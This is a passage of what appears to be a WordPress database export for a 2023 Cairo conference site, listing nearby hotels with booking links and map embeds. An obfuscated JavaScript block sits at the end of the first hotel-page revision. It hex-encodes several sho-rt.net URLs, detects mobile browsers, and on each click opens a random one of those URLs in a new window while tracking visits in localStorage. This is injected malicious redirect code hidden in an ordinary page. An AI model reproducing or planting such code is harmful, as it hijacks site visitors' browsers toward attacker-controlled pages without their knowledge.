</a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffffff;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p>\n<h5 style=\"text-align: center;\"><a href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\"><span style=\"font-size: 14pt; color: #ffff00;\">BOOK NOW</span></a></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-18 23:37:56','2023-07-18 23:37:56','',2685,'https://gsw2023.com/?p=5035',0,'revision','',0),
(5036,1,'2023-07-18 23:42:50','2023-07-18 23:42:50','<p>[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe></p>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/intercontinental/hotels/us/en/cairo/croha/hoteldetail?fromRedirect=true&amp;qSrt=sAV&amp;qIta=99801505&amp;icdv=99801505&amp;qSlH=CROHA&amp;qGrpCd=DY8&amp;setPMCookies=true&amp;qSHBrC=IC&amp;qDest=Corniche+El+Nil%252C+Cairo%252C+EG&amp;srb_u=1\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\n<h4></h4>\n<ul>\n<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\n</ul>\n<p>&nbsp;</p>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></p>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">BOOK NOW  </a></strong></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" 